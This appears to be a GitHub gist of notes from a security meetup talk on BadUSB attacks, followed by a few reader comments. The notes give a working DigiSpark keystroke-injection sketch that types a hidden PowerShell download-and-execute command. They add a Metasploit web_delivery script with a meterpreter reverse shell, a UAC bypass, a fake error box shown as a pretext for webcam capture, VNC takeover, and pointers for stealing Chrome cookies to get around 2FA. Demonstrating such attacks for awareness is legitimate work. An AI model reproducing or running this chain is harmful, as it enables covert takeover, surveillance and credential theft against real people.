Notes of Null talk on BadUSB
## Bad USB code
#include "DigiKeyboard.h" | |
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished | |
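/// Arduino entry point run once at power-up.
///
/// Configures the indicator pin as an output. The original sketch left this
/// empty, so the digitalWrite() calls in loop() only toggled the pin's internal
/// pull-up instead of driving the LED, and the "working" indicator never lit.
void setup() {
  pinMode(WorkingPin, OUTPUT);
}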
/// Arduino main loop: emulates a USB keyboard to type one command line into the
/// host, then parks forever so the sequence is sent exactly once per power-up.
///
/// Timing and ordering of the keystrokes below are what the demo depends on, so
/// the calls are left exactly as written and only annotated.
void loop() {
  // Indicator LED on while the keystroke sequence is being sent.
  digitalWrite(WorkingPin, HIGH);
  // An empty keystroke report before any real key; presumably lets the host
  // finish enumerating the HID device first -- the sketch does not say.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  // Left GUI modifier + R (Win+R on Windows opens the Run dialog). The delay
  // gives the host time to show the dialog before text is typed into it.
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  // Types a PowerShell one-liner that downloads a script from the hard-coded
  // demo address (net.webclient, via the system proxy with default
  // credentials) and runs it with IEX. From a defender's view this is the
  // classic HID-injection + download-and-execute chain: USB device-control
  // policy and PowerShell command-line / script-block logging are the places
  // it is expected to surface.
  DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  // Sequence finished: indicator LED off.
  digitalWrite(WorkingPin, LOW);
  for (;;) {
    /* Stops the DigiSpark from running the script again: loop() never returns,
       so the Arduino runtime cannot call it a second time. */
  }
}
## Metasploit resource file used in demonstration msf-web-delivery.rc | |
use exploit/multi/script/web_delivery | |
set Target 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
set LPORT 6680 | |
set payload windows/x64/meterpreter/reverse_tcp | |
set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies | |
exploit -j | |
## For popping up an innocuous message box before starting to capture webcam snaps
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527 | |
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox | |
If the above doesn't work, you might need to put `client` at the start of the command (as shown in the video), like this:
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) | |
## For VNC | |
After getting a meterpreter session: `run vnc`.
Then connect with a VNC client on the "local machine".
## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ ) | |
use exploit/windows/local/bypassuac_comhijack | |
set payload windows/x64/meterpreter/reverse_tcp | |
set session 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
exploit | |
## For extracting Google Chrome cookies, since extracting passwords would still require entering the OTP if 2FA is enabled:
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password | |
You can follow the discussion here (quite interesting, if you ask me): https://news.ycombinator.com/item?id=18376323
There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md | |
## State of the art things | |
Bad USB cables : https://mg.lol/blog/badusb-cables/ | |
O.M.G. cables : https://mg.lol/blog/omg-cable/ | |
## Other Useful Things | |
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts | |
#shamelessSelfPromotion Ahead :p | |
You can read my other blogs here : https://lud1161.github.io/ | |
and | |
Here : https://lud1161.wordpress.com/ |
Hello @vishwaskheriwal, sorry to break it to you, but the talk wasn't recorded and I am not getting enough time to make a tutorial for it and put it up online.
Feel free to join the talk, if and when it happens next.
Hello @vishwaskheriwal
This talk is happening again tomorrow, i.e. 29th Aug: https://www.meetup.com/OWASP-Bangalore-Chapter/events/272556608/
Sir, can you provide a video on this topic?